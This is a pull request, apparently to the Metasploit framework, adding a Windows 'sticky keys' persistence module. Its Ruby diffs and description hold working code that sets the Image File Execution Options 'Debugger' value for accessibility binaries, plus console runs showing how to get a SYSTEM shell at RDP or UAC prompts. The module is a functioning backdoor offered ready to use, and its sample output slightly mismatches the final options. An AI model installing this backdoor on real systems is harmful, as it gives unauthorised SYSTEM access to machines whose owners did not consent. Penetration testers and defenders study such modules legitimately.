### PR TITLE
Add the sticky_keys module

### DIFF
--- a/modules/post/windows/manage/sticky_keys.rb
+++ b/modules/post/windows/manage/sticky_keys.rb
@@ -14,10 +14,10 @@ class Metasploit4 < Msf::Post
   DEBUG_REG_PATH = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options'
   DEBUG_REG_VALUE = 'Debugger'
 
-  def initialize(info={})
+  def initialize(info = {})
     super(update_info(info,
-      'Name'         => 'Sticky Keys Persistance Module',
-      'Description'  => %q{
+      'Name'          => 'Sticky Keys Persistance Module',
+      'Description'   => %q{
         This module makes it possible to apply the 'sticky keys' hack to a session with appropriate
         rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP
         login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting
@@ -36,13 +36,17 @@ class Metasploit4 < Msf::Post
         to the target prior to running the module. By default, a SYSTEM command prompt is installed
         using the registry method if this module is run without modifying any parameters.
       },
-      'Author'       => ['OJ Reeves'],
-      'Platform'     => ['win'],
-      'SessionTypes' => ['meterpreter', 'cmd']
+      'Author'        => ['OJ Reeves'],
+      'Platform'      => ['win'],
+      'SessionTypes'  => ['meterpreter', 'cmd'],
+      'Actions'       => [
+          [ 'ADD',    { 'Description' => 'Add the backdoor to the target.' } ],
+          [ 'REMOVE', { 'Description' => 'Remove the backdoor from the target' } ]
+      ],
+      'DefaultAction' => 'ADD'
     ))
 
     register_options([
-      OptEnum.new('ACTION', [true, 'Specifies whether to add or remove the exploit.', 'ADD', ['ADD', 'REMOVE']]),
       OptEnum.new('TARGET', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK', 'DISP']]),
       OptString.new('EXE', [true, 'Executable to execute when the exploit is triggered', '%SYSTEMROOT%\system32\cmd.exe'])
     ], self.class)
@@ -96,11 +100,11 @@ class Metasploit4 < Msf::Post
       fail_with(Failure::NoAccess, 'The current session does not have administrative rights.')
     end
 
-    print_good("Session has administrator rights, proceeding.")
+    print_good("Session has administrative rights, proceeding.")
 
     target_key = get_target_exe_reg_key
 
-    if datastore['ACTION'] == 'ADD'
+    if action.name == 'ADD'
       command = expand_path(datastore['EXE'])
 
       registry_createkey(target_key)

--- a/modules/post/windows/manage/sticky_keys.rb
+++ b/modules/post/windows/manage/sticky_keys.rb
@@ -40,8 +40,8 @@ class Metasploit4 < Msf::Post
       'Platform'      => ['win'],
       'SessionTypes'  => ['meterpreter', 'cmd'],
       'Actions'       => [
-          [ 'ADD',    { 'Description' => 'Add the backdoor to the target.' } ],
-          [ 'REMOVE', { 'Description' => 'Remove the backdoor from the target' } ]
+        [ 'ADD',    { 'Description' => 'Add the backdoor to the target.' } ],
+        [ 'REMOVE', { 'Description' => 'Remove the backdoor from the target' } ]
       ],
       'DefaultAction' => 'ADD'
     ))

--- a/modules/post/windows/manage/sticky_keys.rb
+++ b/modules/post/windows/manage/sticky_keys.rb
@@ -26,8 +26,9 @@ class Metasploit4 < Msf::Post
         The module options allow for this hack to be applied to:
 
         - SETHC   - sethc.exe is invoked when SHIFT is pressed 5 times.
-        - UTILMAN - utilman.exe is invoked by pressing WINDOWS+U
+        - UTILMAN - Utilman.exe is invoked by pressing WINDOWS+U.
         - OSK     - osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard.
+        - DISP    - DisplaySwitch.exe is invoked by pressing WINDOWS+P.
 
         The hack can be added using the ADD action, and removed with the REMOVE action.
 
@@ -42,7 +43,7 @@ class Metasploit4 < Msf::Post
 
     register_options([
       OptEnum.new('ACTION', [true, 'Specifies whether to add or remove the exploit.', 'ADD', ['ADD', 'REMOVE']]),
-      OptEnum.new('TARGET', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK']]),
+      OptEnum.new('TARGET', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK', 'DISP']]),
       OptString.new('EXE', [true, 'Executable to execute when the exploit is triggered', '%SYSTEMROOT%\system32\cmd.exe'])
     ], self.class)
   end
@@ -53,9 +54,11 @@ class Metasploit4 < Msf::Post
   def get_target_exe_name
     case datastore['TARGET']
     when 'UTILMAN'
-     'utilman.exe'
+     'Utilman.exe'
     when 'OSK'
      'osk.exe'
+    when 'DISP'
+      'DisplaySwitch.exe'
     else
      'sethc.exe'
     end
@@ -70,6 +73,8 @@ class Metasploit4 < Msf::Post
       'WINDOWS+U'
     when 'OSK'
       'WINDOWS+U, then launching the on-screen keyboard'
+    when 'DISP'
+      'WINDOWS+P'
     else
       'SHIFT 5 times'
     end

--- a/modules/post/windows/manage/sticky_keys.rb
+++ b/modules/post/windows/manage/sticky_keys.rb
@@ -40,8 +40,8 @@ class Metasploit4 < Msf::Post
       'Platform'      => ['win'],
       'SessionTypes'  => ['meterpreter', 'cmd'],
       'Actions'       => [
-        [ 'ADD',    { 'Description' => 'Add the backdoor to the target.' } ],
-        [ 'REMOVE', { 'Description' => 'Remove the backdoor from the target' } ]
+        ['ADD',    {'Description' => 'Add the backdoor to the target.'}],
+        ['REMOVE', {'Description' => 'Remove the backdoor from the target.'}]
       ],
       'DefaultAction' => 'ADD'
     ))

--- a/modules/post/windows/manage/sticky_keys.rb
+++ b/modules/post/windows/manage/sticky_keys.rb
@@ -13,9 +13,9 @@ class Metasploit4 < Msf::Post
 
   DEBUG_REG_PATH = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options'
   DEBUG_REG_VALUE = 'Debugger'
-  
+
   def initialize(info={})
-    super(update_info(info, 
+    super(update_info(info,
       'Name'         => 'Sticky Keys Persistance Module',
       'Description'  => %q{
         This module makes it possible to apply the 'sticky keys' hack to a session with appropriate

--- a/modules/post/windows/manage/sticky_keys.rb
+++ b/modules/post/windows/manage/sticky_keys.rb
@@ -88,7 +88,7 @@ class Metasploit4 < Msf::Post
   #
   def run
     unless is_admin?
-      fail_with("The current session does not have administrative rights.")
+      fail_with(Failure::NoAccess, 'The current session does not have administrative rights.')
     end
 
     print_good("Session has administrator rights, proceeding.")

--- a/modules/post/windows/manage/sticky_keys.rb
+++ b/modules/post/windows/manage/sticky_keys.rb
@@ -1,0 +1,111 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Registry
+  include Msf::Post::Windows::Priv
+
+  DEBUG_REG_PATH = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options'
+  DEBUG_REG_VALUE = 'Debugger'
+  
+  def initialize(info={})
+    super(update_info(info, 
+      'Name'         => 'Sticky Keys Persistance Module',
+      'Description'  => %q{
+        This module makes it possible to apply the 'sticky keys' hack to a session with appropriate
+        rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP
+        login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting
+        for certain executables.
+
+        The module options allow for this hack to be applied to:
+
+        - SETHC   - sethc.exe is invoked when SHIFT is pressed 5 times.
+        - UTILMAN - utilman.exe is invoked by pressing WINDOWS+U
+        - OSK     - osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard.
+
+        The hack can be added using the ADD action, and removed with the REMOVE action.
+
+        Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded
+        to the target prior to running the module. By default, a SYSTEM command prompt is installed
+        using the registry method if this module is run without modifying any parameters.
+      },
+      'Author'       => ['OJ Reeves'],
+      'Platform'     => ['win'],
+      'SessionTypes' => ['meterpreter', 'cmd']
+    ))
+
+    register_options([
+      OptEnum.new('ACTION', [true, 'Specifies whether to add or remove the exploit.', 'ADD', ['ADD', 'REMOVE']]),
+      OptEnum.new('TARGET', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK']]),
+      OptString.new('EXE', [true, 'Executable to execute when the exploit is triggered', '%SYSTEMROOT%\system32\cmd.exe'])
+    ], self.class)
+  end
+
+  #
+  # Returns the name of the executable to modify the debugger settings of.
+  #
+  def get_target_exe_name
+    case datastore['TARGET']
+    when 'UTILMAN'
+     'utilman.exe'
+    when 'OSK'
+     'osk.exe'
+    else
+     'sethc.exe'
+    end
+  end
+
+  #
+  # Returns the the key combinations required to invoke the exploit once installed.
+  #
+  def get_target_key_combo
+    case datastore['TARGET']
+    when 'UTILMAN'
+      'WINDOWS+U'
+    when 'OSK'
+      'WINDOWS+U, then launching the on-screen keyboard'
+    else
+      'SHIFT 5 times'
+    end
+  end
+
+  #
+  # Returns the full path to the target's registry key based on the current target
+  # settings.
+  #
+  def get_target_exe_reg_key
+    "#{DEBUG_REG_PATH}\\#{get_target_exe_name}"
+  end
+
+  #
+  # Runs the exploit.
+  #
+  def run
+    unless is_admin?
+      fail_with("The current session does not have administrative rights.")
+    end
+
+    print_good("Session has administrator rights, proceeding.")
+
+    target_key = get_target_exe_reg_key
+
+    if datastore['ACTION'] == 'ADD'
+      command = expand_path(datastore['EXE'])
+
+      registry_createkey(target_key)
+      registry_setvaldata(target_key, DEBUG_REG_VALUE, command, 'REG_SZ')
+
+      print_good("'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing #{get_target_key_combo}.")
+    else
+      registry_deletekey(target_key)
+      print_good("'Sticky keys' removed from registry key #{target_key}.")
+    end
+  end
+
+end


### PR DESCRIPTION
The `sticky keys` "exploit" is well known by all. Yet for some reason we didn't have a post module in MSF that exposes this handy feature.

This PR contains a new module called `post/windows/manage/sticky_keys`, which supports the addition and removal of the sticky keys exploit using the registry hack approach. The module does require a session with admin rights on the box, but this is a persistence mechanism more than anything else.

The module has `ADD` and `REMOVE` actions, which ... er.. add and remove the backdoor! There are 3 sticky keys targets:
1. `sethc.exe` - Set the `TARGET` to `SETHC`, invoke by pressing `SHIFT` 5 times at the UAC or RDP screens.
2. `utilman.exe` - Set the `TARGET` to `UTILMAN`, invoke by pressing `WINDOWS+U` at the UAC or RDP screens.
3. `osk.exe` - Set the `TARGET` to `OSK`, invoke by pressing `WINDOWS+U` at the UAC or RDP screens, then selecting the "on screen keyboard" checkbox and hitting `OK` or `Apply`.
4. `displayswitch.exe` - Set the `TARGET` to `DISP`, invoke by pressing `WINDOWS+P` at the UAC or RDP screens.
## Sample run

```
msf post(sticky_keys) > show options

Module options (post/windows/manage/sticky_keys):

   Name     Current Setting                Required  Description
   ----     ---------------                --------  -----------
   ACTION   ADD                            yes       Specifies whether to add or remove the exploit. (Accepted: ADD, REMOVE)
   EXE      %SYSTEMROOT%\system32\cmd.exe  yes       Executable to execute when the exploit is triggered
   METHOD   REGISTRY                       yes       The sticky keys method to use. (Accepted: REGISTRY, FILE)
   SESSION  1                              yes       The session to run this module on.
   TARGET   OSK                            yes       The target binary to add the exploit to. (Accepted: SETHC, UTILMAN, OSK)

msf post(sticky_keys) > run

[+] Session has administrator rights, proceeding.
[+] 'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing WINDOWS+U, then launching the on-screen keyboard.
[*] Post module execution completed
```

At this point it is possible to get a command prompt as `NT AUTHORITY\SYSTEM` by either:
- Connecting to the RDP login screen
- Getting a low-priv desktop and running something that requires UAC elevation, resulting in the UAC prompt.

From here use the `WINDOWS+U` combination to show the utilities manager, and then launch the on-screen keyboard.

To remove:

```
msf post(sticky_keys) > set ACTION REMOVE
ACTION => REMOVE
msf post(sticky_keys) > run

[+] Session has administrator rights, proceeding.
[+] 'Sticky keys' removed from registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe.
[*] Post module execution completed
```
## Validation
- [ ] Get a system/admin shell and/or meterpreter session.
- [ ] Configure the module to use the system/admin session.
- [ ] Use the `ADD` method to enable the sticky keys backdoor with `SETHC`, `UTILMAN`, `OSK`, and `DISP` options.
- [ ] Validate that each of these vectors works (RDP and/or UAC prompt).
- [ ] Use the `REMOVE` method to disable this backdoor for each, and validate that the backdoor no longer works.

Thanks to @Peleus for his help in testing.
